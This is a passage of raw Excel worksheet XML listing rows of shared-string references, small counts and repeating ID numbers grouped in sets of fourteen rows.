      <c r="B19652" t="s">
        <v>16217</v>
      </c>
      <c r="C19652">
        <v>11</v>
      </c>
      <c r="D19652">
        <v>5522</v>
      </c>
    </row>
    <row r="19653" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19653" t="s">
        <v>16231</v>
      </c>
      <c r="B19653" t="s">
        <v>16218</v>
      </c>
      <c r="C19653">
        <v>0</v>
      </c>
      <c r="D19653">
        <v>5522</v>
      </c>
    </row>
    <row r="19654" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19654" t="s">
        <v>16229</v>
      </c>
      <c r="B19654" t="s">
        <v>16219</v>
      </c>
      <c r="C19654">
        <v>0</v>
      </c>
      <c r="D19654">
        <v>5522</v>
      </c>
    </row>
    <row r="19655" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19655" t="s">
        <v>16230</v>
      </c>
      <c r="B19655" t="s">
        <v>16220</v>
      </c>
      <c r="C19655">
        <v>0</v>
      </c>
      <c r="D19655">
        <v>5522</v>
      </c>
    </row>
    <row r="19656" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19656" t="s">
        <v>16229</v>
      </c>
      <c r="B19656" t="s">
        <v>16221</v>
      </c>
      <c r="C19656">
        <v>0</v>
      </c>
      <c r="D19656">
        <v>5522</v>
      </c>
    </row>
    <row r="19657" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19657" t="s">
        <v>16230</v>
      </c>
      <c r="B19657" t="s">
        <v>16222</v>
      </c>
      <c r="C19657">
        <v>0</v>
      </c>
      <c r="D19657">
        <v>5522</v>
      </c>
    </row>
    <row r="19658" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19658" t="s">
        <v>16223</v>
      </c>
      <c r="B19658" t="s">
        <v>16223</v>
      </c>
      <c r="C19658">
        <v>30</v>
      </c>
      <c r="D19658">
        <v>5522</v>
      </c>
    </row>
    <row r="19659" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19659" t="s">
        <v>16224</v>
      </c>
      <c r="B19659" t="s">
        <v>16224</v>
      </c>
      <c r="C19659">
        <v>1</v>
      </c>
      <c r="D19659">
        <v>5522</v>
      </c>
    </row>
    <row r="19660" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19660" t="s">
        <v>16228</v>
      </c>
      <c r="B19660" t="s">
        <v>16211</v>
      </c>
      <c r="C19660">
        <v>0</v>
      </c>
      <c r="D19660">
        <v>2164</v>
      </c>
    </row>
    <row r="19661" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19661" t="s">
        <v>16231</v>
      </c>
      <c r="B19661" t="s">
        <v>16212</v>
      </c>
      <c r="C19661">
        <v>0</v>
      </c>
      <c r="D19661">
        <v>2164</v>
      </c>
    </row>
    <row r="19662" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19662" t="s">
        <v>16228</v>
      </c>
      <c r="B19662" t="s">
        <v>16213</v>
      </c>
      <c r="C19662">
        <v>0</v>
      </c>
      <c r="D19662">
        <v>2164</v>
      </c>
    </row>
    <row r="19663" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19663" t="s">
        <v>16231</v>
      </c>
      <c r="B19663" t="s">
        <v>16214</v>
      </c>
      <c r="C19663">
        <v>0</v>
      </c>
      <c r="D19663">
        <v>2164</v>
      </c>
    </row>
    <row r="19664" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19664" t="s">
        <v>16228</v>
      </c>
      <c r="B19664" t="s">
        <v>16215</v>
      </c>
      <c r="C19664">
        <v>1</v>
      </c>
      <c r="D19664">
        <v>2164</v>
      </c>
    </row>
    <row r="19665" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19665" t="s">
        <v>16231</v>
      </c>
      <c r="B19665" t="s">
        <v>16216</v>
      </c>
      <c r="C19665">
        <v>0</v>
      </c>
      <c r="D19665">
        <v>2164</v>
      </c>
    </row>
    <row r="19666" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19666" t="s">
        <v>16228</v>
      </c>
      <c r="B19666" t="s">
        <v>16217</v>
      </c>
      <c r="C19666">
        <v>0</v>
      </c>
      <c r="D19666">
        <v>2164</v>
      </c>
    </row>
    <row r="19667" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19667" t="s">
        <v>16231</v>
      </c>
      <c r="B19667" t="s">
        <v>16218</v>
      </c>
      <c r="C19667">
        <v>6</v>
      </c>
      <c r="D19667">
        <v>2164</v>
      </c>
    </row>
    <row r="19668" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19668" t="s">
        <v>16229</v>
      </c>
      <c r="B19668" t="s">
        <v>16219</v>
      </c>
      <c r="C19668">
        <v>0</v>
      </c>
      <c r="D19668">
        <v>2164</v>
      </c>
    </row>
    <row r="19669" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19669" t="s">
        <v>16230</v>
      </c>
      <c r="B19669" t="s">
        <v>16220</v>
      </c>
      <c r="C19669">
        <v>0</v>
      </c>
      <c r="D19669">
        <v>2164</v>
      </c>
    </row>
    <row r="19670" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19670" t="s">
        <v>16229</v>
      </c>
      <c r="B19670" t="s">
        <v>16221</v>
      </c>
      <c r="C19670">
        <v>0</v>
      </c>
      <c r="D19670">
        <v>2164</v>
      </c>
    </row>
    <row r="19671" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19671" t="s">
        <v>16230</v>
      </c>
      <c r="B19671" t="s">
        <v>16222</v>
      </c>
      <c r="C19671">
        <v>0</v>
      </c>
      <c r="D19671">
        <v>2164</v>
      </c>
    </row>
    <row r="19672" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19672" t="s">
        <v>16223</v>
      </c>
      <c r="B19672" t="s">
        <v>16223</v>
      </c>
      <c r="C19672">
        <v>25</v>
      </c>
      <c r="D19672">
        <v>2164</v>
      </c>
    </row>
    <row r="19673" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19673" t="s">
        <v>16224</v>
      </c>
      <c r="B19673" t="s">
        <v>16224</v>
      </c>
      <c r="C19673">
        <v>1</v>
      </c>
      <c r="D19673">
        <v>2164</v>
      </c>
    </row>
    <row r="19674" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19674" t="s">
        <v>16228</v>
      </c>
      <c r="B19674" t="s">
        <v>16211</v>
      </c>
      <c r="C19674">
        <v>0</v>
      </c>
      <c r="D19674">
        <v>5632</v>
      </c>
    </row>
    <row r="19675" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19675" t="s">
        <v>16231</v>
      </c>
      <c r="B19675" t="s">
        <v>16212</v>
      </c>
      <c r="C19675">
        <v>0</v>
      </c>
      <c r="D19675">
        <v>5632</v>
      </c>
    </row>
    <row r="19676" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19676" t="s">
        <v>16228</v>
      </c>
      <c r="B19676" t="s">
        <v>16213</v>
      </c>
      <c r="C19676">
        <v>0</v>
      </c>
      <c r="D19676">
        <v>5632</v>
      </c>
    </row>
    <row r="19677" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19677" t="s">
        <v>16231</v>
      </c>
      <c r="B19677" t="s">
        <v>16214</v>
      </c>
      <c r="C19677">
        <v>0</v>
      </c>
      <c r="D19677">
        <v>5632</v>
      </c>
    </row>
    <row r="19678" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19678" t="s">
        <v>16228</v>
      </c>
      <c r="B19678" t="s">
        <v>16215</v>
      </c>
      <c r="C19678">
        <v>0</v>
      </c>
      <c r="D19678">
        <v>5632</v>
      </c>
    </row>
    <row r="19679" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19679" t="s">
        <v>16231</v>
      </c>
      <c r="B19679" t="s">
        <v>16216</v>
      </c>
      <c r="C19679">
        <v>0</v>
      </c>
      <c r="D19679">
        <v>5632</v>
      </c>
    </row>
    <row r="19680" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19680" t="s">
        <v>16228</v>
      </c>
      <c r="B19680" t="s">
        <v>16217</v>
      </c>
      <c r="C19680">
        <v>0</v>
      </c>
      <c r="D19680">
        <v>5632</v>
      </c>
    </row>
    <row r="19681" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19681" t="s">
        <v>16231</v>
      </c>
      <c r="B19681" t="s">
        <v>16218</v>
      </c>
      <c r="C19681">
        <v>3</v>
      </c>
      <c r="D19681">
        <v>5632</v>
      </c>
    </row>
    <row r="19682" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19682" t="s">
        <v>16229</v>
      </c>
      <c r="B19682" t="s">
        <v>16219</v>
      </c>
      <c r="C19682">
        <v>0</v>
      </c>
      <c r="D19682">
        <v>5632</v>
      </c>
    </row>
    <row r="19683" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19683" t="s">
        <v>16230</v>
      </c>
      <c r="B19683" t="s">
        <v>16220</v>
      </c>
      <c r="C19683">
        <v>0</v>
      </c>
      <c r="D19683">
        <v>5632</v>
      </c>
    </row>
    <row r="19684" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19684" t="s">
        <v>16229</v>
      </c>
      <c r="B19684" t="s">
        <v>16221</v>
      </c>
      <c r="C19684">
        <v>1</v>
      </c>
      <c r="D19684">
        <v>5632</v>
      </c>
    </row>
    <row r="19685" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19685" t="s">
        <v>16230</v>
      </c>
      <c r="B19685" t="s">
        <v>16222</v>
      </c>
      <c r="C19685">
        <v>3</v>
      </c>
      <c r="D19685">
        <v>5632</v>
      </c>
    </row>
    <row r="19686" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19686" t="s">
        <v>16223</v>
      </c>
      <c r="B19686" t="s">
        <v>16223</v>
      </c>
      <c r="C19686">
        <v>25</v>
      </c>
      <c r="D19686">
        <v>5632</v>
      </c>
    </row>
    <row r="19687" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19687" t="s">
        <v>16224</v>
      </c>
      <c r="B19687" t="s">
        <v>16224</v>
      </c>
      <c r="C19687">
        <v>1</v>
      </c>
      <c r="D19687">
        <v>5632</v>
      </c>
    </row>
    <row r="19688" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19688" t="s">
        <v>16228</v>
      </c>
      <c r="B19688" t="s">
        <v>16211</v>
      </c>
      <c r="C19688">
        <v>0</v>
      </c>
      <c r="D19688">
        <v>5193</v>
      </c>
    </row>
    <row r="19689" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19689" t="s">
        <v>16231</v>
      </c>
      <c r="B19689" t="s">
        <v>16212</v>
      </c>
      <c r="C19689">
        <v>0</v>
      </c>
      <c r="D19689">
        <v>5193</v>
      </c>
    </row>
    <row r="19690" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19690" t="s">
        <v>16228</v>
      </c>
      <c r="B19690" t="s">
        <v>16213</v>
      </c>
      <c r="C19690">
        <v>0</v>
      </c>
      <c r="D19690">
        <v>5193</v>
      </c>
    </row>
    <row r="19691" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19691" t="s">
        <v>16231</v>
      </c>
      <c r="B19691" t="s">
        <v>16214</v>
      </c>
      <c r="C19691">
        <v>0</v>
      </c>
      <c r="D19691">
        <v>5193</v>
      </c>
    </row>
    <row r="19692" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19692" t="s">
        <v>16228</v>
      </c>
      <c r="B19692" t="s">
        <v>16215</v>
      </c>
      <c r="C19692">
        <v>1</v>
      </c>
      <c r="D19692">
        <v>5193</v>
      </c>
    </row>
    <row r="19693" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19693" t="s">
        <v>16231</v>
      </c>
      <c r="B19693" t="s">
        <v>16216</v>
      </c>
      <c r="C19693">
        <v>0</v>
      </c>
      <c r="D19693">
        <v>5193</v>
      </c>
    </row>
    <row r="19694" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19694" t="s">
        <v>16228</v>
      </c>
      <c r="B19694" t="s">
        <v>16217</v>
      </c>
      <c r="C19694">
        <v>6</v>
      </c>
      <c r="D19694">
        <v>5193</v>
      </c>
    </row>
    <row r="19695" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19695" t="s">
        <v>16231</v>
      </c>
      <c r="B19695" t="s">
        <v>16218</v>
      </c>
      <c r="C19695">
        <v>0</v>
      </c>
      <c r="D19695">
        <v>5193</v>
      </c>
    </row>
    <row r="19696" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19696" t="s">
        <v>16229</v>
      </c>
      <c r="B19696" t="s">
        <v>16219</v>
      </c>
      <c r="C19696">
        <v>0</v>
      </c>
      <c r="D19696">
        <v>5193</v>
      </c>
    </row>
    <row r="19697" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19697" t="s">
        <v>16230</v>
      </c>
      <c r="B19697" t="s">
        <v>16220</v>
      </c>
      <c r="C19697">
        <v>0</v>
      </c>
      <c r="D19697">
        <v>5193</v>
      </c>
    </row>
    <row r="19698" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19698" t="s">
        <v>16229</v>
      </c>
      <c r="B19698" t="s">
        <v>16221</v>
      </c>
      <c r="C19698">
        <v>0</v>
      </c>
      <c r="D19698">
        <v>5193</v>
      </c>
    </row>
    <row r="19699" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19699" t="s">
        <v>16230</v>
      </c>
      <c r="B19699" t="s">
        <v>16222</v>
      </c>
      <c r="C19699">
        <v>0</v>
      </c>
      <c r="D19699">
        <v>5193</v>
      </c>
    </row>
    <row r="19700" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19700" t="s">
        <v>16223</v>
      </c>
      <c r="B19700" t="s">
        <v>16223</v>
      </c>
      <c r="C19700">
        <v>20</v>
      </c>
      <c r="D19700">
        <v>5193</v>
      </c>
    </row>
    <row r="19701" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19701" t="s">
        <v>16224</v>
      </c>
      <c r="B19701" t="s">
        <v>16224</v>
      </c>
      <c r="C19701">
        <v>0</v>
      </c>
      <c r="D19701">
        <v>5193</v>
      </c>
    </row>
    <row r="19702" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19702" t="s">
        <v>16228</v>
      </c>
      <c r="B19702" t="s">
        <v>16211</v>
      </c>
      <c r="C19702">
        <v>0</v>
      </c>
      <c r="D19702">
        <v>1779</v>
      </c>
    </row>
    <row r="19703" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19703" t="s">
        <v>16231</v>
      </c>
      <c r="B19703" t="s">
        <v>16212</v>
      </c>
      <c r="C19703">
        <v>0</v>
      </c>
      <c r="D19703">
        <v>1779</v>
      </c>
    </row>
    <row r="19704" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19704" t="s">
        <v>16228</v>
      </c>
      <c r="B19704" t="s">
        <v>16213</v>
      </c>
      <c r="C19704">
        <v>0</v>
      </c>
      <c r="D19704">
        <v>1779</v>
      </c>
    </row>
    <row r="19705" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19705" t="s">
        <v>16231</v>
      </c>
      <c r="B19705" t="s">
        <v>16214</v>
      </c>
      <c r="C19705">
        <v>0</v>
      </c>
      <c r="D19705">
        <v>1779</v>
      </c>
    </row>
    <row r="19706" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19706" t="s">
        <v>16228</v>
      </c>
      <c r="B19706" t="s">
        <v>16215</v>
      </c>
      <c r="C19706">
        <v>2</v>
      </c>
      <c r="D19706">
        <v>1779</v>
      </c>
    </row>
    <row r="19707" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19707" t="s">
        <v>16231</v>
      </c>
      <c r="B19707" t="s">
        <v>16216</v>
      </c>
      <c r="C19707">
        <v>4</v>
      </c>
      <c r="D19707">
        <v>1779</v>
      </c>
    </row>
    <row r="19708" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19708" t="s">
        <v>16228</v>
      </c>
      <c r="B19708" t="s">
        <v>16217</v>
      </c>
      <c r="C19708">
        <v>1</v>
      </c>
      <c r="D19708">
        <v>1779</v>
      </c>
    </row>
    <row r="19709" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19709" t="s">
        <v>16231</v>
      </c>
      <c r="B19709" t="s">
        <v>16218</v>
      </c>
      <c r="C19709">
        <v>0</v>
      </c>
      <c r="D19709">
        <v>1779</v>
      </c>
    </row>
    <row r="19710" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19710" t="s">
        <v>16229</v>
      </c>
      <c r="B19710" t="s">
        <v>16219</v>
      </c>
      <c r="C19710">
        <v>0</v>
      </c>
      <c r="D19710">
        <v>1779</v>
      </c>
    </row>
    <row r="19711" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19711" t="s">
        <v>16230</v>
      </c>
      <c r="B19711" t="s">
        <v>16220</v>
      </c>
      <c r="C19711">
        <v>0</v>
      </c>
      <c r="D19711">
        <v>1779</v>
      </c>
    </row>
    <row r="19712" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19712" t="s">
        <v>16229</v>
      </c>
      <c r="B19712" t="s">
        <v>16221</v>
      </c>
      <c r="C19712">
        <v>15</v>
      </c>
      <c r="D19712">
        <v>1779</v>
      </c>
    </row>
    <row r="19713" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19713" t="s">
        <v>16230</v>
      </c>
      <c r="B19713" t="s">
        <v>16222</v>
      </c>
      <c r="C19713">
        <v>30</v>
      </c>
      <c r="D19713">
        <v>1779</v>
      </c>
    </row>
    <row r="19714" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19714" t="s">
        <v>16223</v>
      </c>
      <c r="B19714" t="s">
        <v>16223</v>
      </c>
      <c r="C19714">
        <v>0</v>
      </c>
      <c r="D19714">
        <v>1779</v>
      </c>
    </row>
    <row r="19715" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19715" t="s">
        <v>16224</v>
      </c>
      <c r="B19715" t="s">
        <v>16224</v>
      </c>
      <c r="C19715">
        <v>0</v>
      </c>
      <c r="D19715">
        <v>1779</v>
      </c>
    </row>
    <row r="19716" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19716" t="s">
        <v>16228</v>
      </c>
      <c r="B19716" t="s">
        <v>16211</v>
      </c>
      <c r="C19716">
        <v>0</v>
      </c>
      <c r="D19716">
        <v>5639</v>
      </c>
    </row>
    <row r="19717" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19717" t="s">
        <v>16231</v>
      </c>
      <c r="B19717" t="s">
        <v>16212</v>
      </c>
      <c r="C19717">
        <v>0</v>
      </c>
      <c r="D19717">
        <v>5639</v>
      </c>
    </row>
    <row r="19718" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19718" t="s">
        <v>16228</v>
      </c>
      <c r="B19718" t="s">
        <v>16213</v>
      </c>
      <c r="C19718">
        <v>0</v>
      </c>
      <c r="D19718">
        <v>5639</v>
      </c>
    </row>
    <row r="19719" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19719" t="s">
        <v>16231</v>
      </c>
      <c r="B19719" t="s">
        <v>16214</v>
      </c>
      <c r="C19719">
        <v>0</v>
      </c>
      <c r="D19719">
        <v>5639</v>
      </c>
    </row>
    <row r="19720" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19720" t="s">
        <v>16228</v>
      </c>
      <c r="B19720" t="s">
        <v>16215</v>
      </c>
      <c r="C19720">
        <v>0</v>
      </c>
      <c r="D19720">
        <v>5639</v>
      </c>
    </row>
    <row r="19721" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19721" t="s">
        <v>16231</v>
      </c>
      <c r="B19721" t="s">
        <v>16216</v>
      </c>
      <c r="C19721">
        <v>0</v>
      </c>
      <c r="D19721">
        <v>5639</v>
      </c>
    </row>
    <row r="19722" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19722" t="s">
        <v>16228</v>
      </c>
      <c r="B19722" t="s">
        <v>16217</v>
      </c>
      <c r="C19722">
        <v>0</v>
      </c>
      <c r="D19722">
        <v>5639</v>
      </c>
    </row>
    <row r="19723" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19723" t="s">
        <v>16231</v>
      </c>
      <c r="B19723" t="s">
        <v>16218</v>
      </c>
      <c r="C19723">
        <v>2</v>
      </c>
      <c r="D19723">
        <v>5639</v>
      </c>
    </row>
    <row r="19724" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19724" t="s">
        <v>16229</v>
      </c>
      <c r="B19724" t="s">
        <v>16219</v>
      </c>
      <c r="C19724">
        <v>0</v>
      </c>
      <c r="D19724">
        <v>5639</v>
      </c>
    </row>
    <row r="19725" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19725" t="s">
        <v>16230</v>
      </c>
      <c r="B19725" t="s">
        <v>16220</v>
      </c>
      <c r="C19725">
        <v>0</v>
      </c>
      <c r="D19725">
        <v>5639</v>
      </c>
    </row>
    <row r="19726" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19726" t="s">
        <v>16229</v>
      </c>
      <c r="B19726" t="s">
        <v>16221</v>
      </c>
      <c r="C19726">
        <v>0</v>
      </c>
      <c r="D19726">
        <v>5639</v>
      </c>
    </row>
    <row r="19727" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19727" t="s">
        <v>16230</v>
      </c>
      <c r="B19727" t="s">
        <v>16222</v>
      </c>
      <c r="C19727">
        <v>0</v>
      </c>
      <c r="D19727">
        <v>5639</v>
      </c>
    </row>
    <row r="19728" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19728" t="s">
        <v>16223</v>
      </c>
      <c r="B19728" t="s">
        <v>16223</v>
      </c>
      <c r="C19728">
        <v>12</v>
      </c>
      <c r="D19728">
        <v>5639</v>
      </c>
    </row>
    <row r="19729" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19729" t="s">
        <v>16224</v>
      </c>
      <c r="B19729" t="s">
        <v>16224</v>
      </c>
      <c r="C19729">
        <v>0</v>
      </c>
      <c r="D19729">
        <v>5639</v>
      </c>
    </row>
    <row r="19730" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19730" t="s">
        <v>16228</v>
      </c>
      <c r="B19730" t="s">
        <v>16211</v>
      </c>
      <c r="C19730">
        <v>0</v>
      </c>
      <c r="D19730">
        <v>5617</v>
      </c>
    </row>
    <row r="19731" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19731" t="s">
        <v>16231</v>
      </c>
      <c r="B19731" t="s">
        <v>16212</v>
      </c>
      <c r="C19731">
        <v>0</v>
      </c>
      <c r="D19731">
        <v>5617</v>
      </c>
    </row>
    <row r="19732" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19732" t="s">
        <v>16228</v>
      </c>
      <c r="B19732" t="s">
        <v>16213</v>
      </c>
      <c r="C19732">
        <v>0</v>
      </c>
      <c r="D19732">
        <v>5617</v>
      </c>
    </row>
    <row r="19733" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19733" t="s">
        <v>16231</v>
      </c>
      <c r="B19733" t="s">
        <v>16214</v>
      </c>
      <c r="C19733">
        <v>0</v>
      </c>
      <c r="D19733">
        <v>5617</v>
      </c>
    </row>
    <row r="19734" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19734" t="s">
        <v>16228</v>
      </c>
      <c r="B19734" t="s">
        <v>16215</v>
      </c>
      <c r="C19734">
        <v>0</v>
      </c>
      <c r="D19734">
        <v>5617</v>
      </c>
    </row>
    <row r="19735" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19735" t="s">
        <v>16231</v>
      </c>
      <c r="B19735" t="s">
        <v>16216</v>
      </c>
      <c r="C19735">
        <v>1</v>
      </c>
      <c r="D19735">
        <v>5617</v>
      </c>
    </row>
    <row r="19736" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19736" t="s">
        <v>16228</v>
      </c>
      <c r="B19736" t="s">
        <v>16217</v>
      </c>
      <c r="C19736">
        <v>1</v>
      </c>
      <c r="D19736">
        <v>5617</v>
      </c>
    </row>
    <row r="19737" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19737" t="s">
        <v>16231</v>
      </c>
      <c r="B19737" t="s">
        <v>16218</v>
      </c>
      <c r="C19737">
        <v>2</v>
      </c>
      <c r="D19737">
        <v>5617</v>
      </c>
    </row>
    <row r="19738" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19738" t="s">
        <v>16229</v>
      </c>
      <c r="B19738" t="s">
        <v>16219</v>
      </c>
      <c r="C19738">
        <v>0</v>
      </c>
      <c r="D19738">
        <v>5617</v>
      </c>
    </row>
    <row r="19739" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19739" t="s">
        <v>16230</v>
      </c>
      <c r="B19739" t="s">
        <v>16220</v>
      </c>
      <c r="C19739">
        <v>0</v>
      </c>
      <c r="D19739">
        <v>5617</v>
      </c>
    </row>
    <row r="19740" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19740" t="s">
        <v>16229</v>
      </c>
      <c r="B19740" t="s">
        <v>16221</v>
      </c>
      <c r="C19740">
        <v>1</v>
      </c>
      <c r="D19740">
        <v>5617</v>
      </c>
    </row>
    <row r="19741" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19741" t="s">
        <v>16230</v>
      </c>
      <c r="B19741" t="s">
        <v>16222</v>
      </c>
      <c r="C19741">
        <v>1</v>
      </c>
      <c r="D19741">
        <v>5617</v>
      </c>
    </row>
    <row r="19742" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19742" t="s">
        <v>16223</v>
      </c>
      <c r="B19742" t="s">
        <v>16223</v>
      </c>
      <c r="C19742">
        <v>0</v>
      </c>
      <c r="D19742">
        <v>5617</v>
      </c>
    </row>
    <row r="19743" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19743" t="s">
        <v>16224</v>
      </c>
      <c r="B19743" t="s">
        <v>16224</v>
      </c>
      <c r="C19743">
        <v>0</v>
      </c>
      <c r="D19743">
        <v>5617</v>
      </c>
    </row>
    <row r="19744" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19744" t="s">
        <v>16228</v>
      </c>
      <c r="B19744" t="s">
        <v>16211</v>
      </c>
      <c r="C19744">
        <v>0</v>
      </c>
      <c r="D19744">
        <v>5613</v>
      </c>
    </row>
    <row r="19745" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19745" t="s">
        <v>16231</v>
      </c>
      <c r="B19745" t="s">
        <v>16212</v>
      </c>
      <c r="C19745">
        <v>0</v>
      </c>
      <c r="D19745">
        <v>5613</v>
      </c>
    </row>
    <row r="19746" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19746" t="s">
        <v>16228</v>
      </c>
      <c r="B19746" t="s">
        <v>16213</v>
      </c>
      <c r="C19746">
        <v>0</v>
      </c>
      <c r="D19746">
        <v>5613</v>
      </c>
    </row>
    <row r="19747" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19747" t="s">
        <v>16231</v>
      </c>
      <c r="B19747" t="s">
        <v>16214</v>
      </c>
      <c r="C19747">
        <v>0</v>
      </c>
      <c r="D19747">
        <v>5613</v>
      </c>
    </row>
    <row r="19748" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19748" t="s">
        <v>16228</v>
      </c>
      <c r="B19748" t="s">
        <v>16215</v>
      </c>
      <c r="C19748">
        <v>1</v>
      </c>
      <c r="D19748">
        <v>5613</v>
      </c>
    </row>
    <row r="19749" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19749" t="s">
        <v>16231</v>
      </c>
      <c r="B19749" t="s">
        <v>16216</v>
      </c>
      <c r="C19749">
        <v>1</v>
      </c>
      <c r="D19749">
        <v>5613</v>
      </c>
    </row>
    <row r="19750" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19750" t="s">
        <v>16228</v>
      </c>
      <c r="B19750" t="s">
        <v>16217</v>
      </c>
      <c r="C19750">
        <v>2</v>
      </c>
      <c r="D19750">
        <v>5613</v>
      </c>
    </row>
    <row r="19751" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19751" t="s">
        <v>16231</v>
      </c>
      <c r="B19751" t="s">
        <v>16218</v>
      </c>
      <c r="C19751">
        <v>2</v>
      </c>
      <c r="D19751">
        <v>5613</v>
      </c>
    </row>
    <row r="19752" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19752" t="s">
        <v>16229</v>
      </c>
      <c r="B19752" t="s">
        <v>16219</v>
      </c>
      <c r="C19752">
        <v>0</v>
      </c>
      <c r="D19752">
        <v>5613</v>
      </c>
    </row>
    <row r="19753" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19753" t="s">
        <v>16230</v>
      </c>
      <c r="B19753" t="s">
        <v>16220</v>
      </c>
      <c r="C19753">
        <v>0</v>
      </c>
      <c r="D19753">
        <v>5613</v>
      </c>
    </row>
    <row r="19754" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19754" t="s">
        <v>16229</v>
      </c>
      <c r="B19754" t="s">
        <v>16221</v>
      </c>
      <c r="C19754">
        <v>2</v>
      </c>
      <c r="D19754">
        <v>5613</v>
      </c>
    </row>
    <row r="19755" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19755" t="s">
        <v>16230</v>
      </c>
      <c r="B19755" t="s">
        <v>16222</v>
      </c>
      <c r="C19755">
        <v>6</v>
      </c>
      <c r="D19755">
        <v>5613</v>
      </c>
    </row>
    <row r="19756" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19756" t="s">
        <v>16223</v>
      </c>
      <c r="B19756" t="s">
        <v>16223</v>
      </c>
      <c r="C19756">
        <v>26</v>
      </c>
      <c r="D19756">
        <v>5613</v>
      </c>
    </row>
    <row r="19757" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19757" t="s">
